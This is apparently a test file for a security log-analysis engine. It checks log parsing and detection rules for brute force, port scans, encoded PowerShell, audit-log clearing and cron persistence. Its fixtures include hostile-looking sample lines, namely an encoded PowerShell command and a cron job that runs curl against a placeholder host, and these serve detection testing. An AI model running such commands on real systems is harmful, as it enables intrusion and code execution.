import fs from 'node:fs';
import vm from 'node:vm';
import assert from 'node:assert/strict';
const code=fs.readFileSync(new URL('../site/log-engine.js',import.meta.url),'utf8');const fix=fs.readFileSync(new URL('../site/log-normalize-fixes.js',import.meta.url),'utf8');
const ctx={globalThis:{},console,Date,JSON,Map,Set,Number};ctx.globalThis=ctx;vm.createContext(ctx);vm.runInContext(code,ctx);vm.runInContext(fix,ctx);const L=ctx.DBMLogEngine;let passed=0;
function test(name,fn){try{fn();passed++;console.log('✓',name)}catch(e){console.error('✗',name);throw e}}
test('detects supported formats',()=>{assert.equal(L.detectFormat('[{"message":"x"}]'),'json');assert.equal(L.detectFormat('{"message":"x"}\n{"message":"y"}'),'ndjson');assert.equal(L.detectFormat('timestamp,host,message\n2026-08-18T10:00:00Z,a,ok'),'csv');assert.equal(L.detectFormat('CEF:0|Vendor|Product|1|100|Alert|8|src=1.2.3.4'),'cef');assert.equal(L.detectFormat('LEEF:2.0|Vendor|Product|1|100|src=1.2.3.4'),'leef');assert.equal(L.detectFormat('<34>2026-08-18T10:00:00Z host sshd[1]: Failed password'),'syslog')});
test('preserves malformed NDJSON instead of dropping it',()=>{const r=L.analyzeLogs('{"message":"ok"}\nNOT_JSON\n{"message":"also ok"}');assert.equal(r.events.length,3);assert.equal(r.summary.parse.malformed,1);assert.equal(r.summary.parse.dropped,0);assert.ok(r.events.some(e=>e.quality.includes('malformed-record')))});
test('handles CSV quoting and mixed line endings',()=>{const r=L.analyzeLogs('timestamp,host,message\r\n2026-08-18T10:00:00Z,web01,"hello, world"\n');assert.equal(r.events.length,1);assert.equal(r.events[0].message,'hello, world');assert.equal(r.events[0].host,'web01')});
test('parses RFC5424 syslog NILVALUE without leaking structured-data marker',()=>{const r=L.analyzeLogs('<34>1 2026-08-18T10:00:00Z host app 123 ID47 - hello');assert.equal(r.events[0].host,'host');assert.equal(r.events[0].process,'app');assert.equal(r.events[0].message,'hello')});
test('preserves unicode and Georgian text',()=>{const r=L.analyzeLogs('2026 ინფორმაცია: მომხმარებელი შევიდა სისტემაში');assert.match(r.events[0].message,/მომხმარებელი/)});
test('marks invalid timestamps without inventing current time',()=>{const r=L.analyzeLogs(JSON.stringify({timestamp:'not-a-date',message:'x'}));assert.equal(r.events[0].timestamp,'not-a-date');assert.equal(r.events[0].timestampValid,false);assert.ok(r.events[0].quality.includes('invalid-timestamp'))});
test('normalizes extended heterogeneous fields',()=>{const r=L.analyzeLogs(JSON.stringify({'@timestamp':'2026-08-18T10:00:00Z',event:{code:4625,module:'windows'},host:{name:'DC01'},source:{ip:'203.0.113.4',port:5555},destination:{ip:'10.0.0.4',port:3389},user:{name:'admin',domain:'CORP'},process:{name:'powershell.exe',parent:{name:'cmd.exe'},pid:42},network:{transport:'tcp'},http:{request:{method:'POST'}},message:'An account failed to log on'}));const e=r.events[0];assert.equal(e.eventId,'4625');assert.equal(e.parentProcess,'cmd.exe');assert.equal(e.domain,'CORP');assert.equal(e.protocol,'tcp');assert.equal(e.httpMethod,'POST');assert.ok(r.findings.some(f=>f.ruleId==='WIN-4625'&&f.evidence.length&&f.confidence))});
test('detects encoded PowerShell and audit-log clearing',()=>{const rows=[{'@timestamp':'2026-08-18T10:00:00Z',event:{code:4688},process:{name:'powershell.exe',command_line:'powershell.exe -EncodedCommand SQBFAFgA'},message:'new process'},{'@timestamp':'2026-08-18T10:01:00Z',event:{code:1102},message:'The audit log was cleared'}];const r=L.analyzeLogs(JSON.stringify(rows));assert.ok(r.findings.some(f=>f.ruleId==='WIN-4688-PS'));assert.ok(r.findings.some(f=>f.ruleId==='WIN-1102'&&f.remediation))});
test('detects scheduled tasks and Linux cron persistence indicators',()=>{const r=L.analyzeLogs(JSON.stringify([{'@timestamp':'2026-08-18T10:00:00Z',event:{code:4698},message:'task created'},{'@timestamp':'2026-08-18T10:00:01Z',event:{module:'cron'},message:'CRON bash -c curl https://example.invalid/a'}]));assert.ok(r.findings.some(f=>f.ruleId==='WIN-4698'));assert.ok(r.findings.some(f=>f.ruleId==='LINUX-CRON'))});
test('correlates repeated authentication failures at threshold',()=>{const rows=Array.from({length:5},(_,i)=>({'@timestamp':`2026-08-18T10:00:0${i}Z`,event:{code:4625},source:{ip:'198.51.100.10'},user:{name:'administrator'},message:'failed logon'}));const r=L.analyzeLogs(JSON.stringify(rows));const f=r.findings.find(x=>x.ruleId==='CORR-BRUTEFORCE');assert.ok(f);assert.equal(f.eventIds.length,5);assert.equal(f.confidence,'high')});
test('does not correlate failures outside time window',()=>{const rows=Array.from({length:5},(_,i)=>({'@timestamp':`2026-08-18T10:${String(i*10).padStart(2,'0')}:00Z`,event:{code:4625},source:{ip:'198.51.100.10'},message:'failed logon'}));const r=L.analyzeLogs(JSON.stringify(rows));assert.equal(r.findings.some(f=>f.ruleId==='CORR-BRUTEFORCE'),false)});
test('correlates multi-port activity and exports extended CSV',()=>{const rows=Array.from({length:12},(_,i)=>({'@timestamp':`2026-08-18T10:00:${String(i).padStart(2,'0')}Z`,source:{ip:'192.0.2.50',port:44000+i},destination:{ip:'10.0.0.9',port:20+i},event:{action:'connection'},message:'network connection'}));const r=L.analyzeLogs(JSON.stringify(rows));assert.ok(r.findings.some(f=>f.ruleId==='CORR-PORTSCAN'));assert.match(L.exportCsv(r.events),/parentProcess/)});
console.log(`BlackLog tests passed: ${passed}/12`);
